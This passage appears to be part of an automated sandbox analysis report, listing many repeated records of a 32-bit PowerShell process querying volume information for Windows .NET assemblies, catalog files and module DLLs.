Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
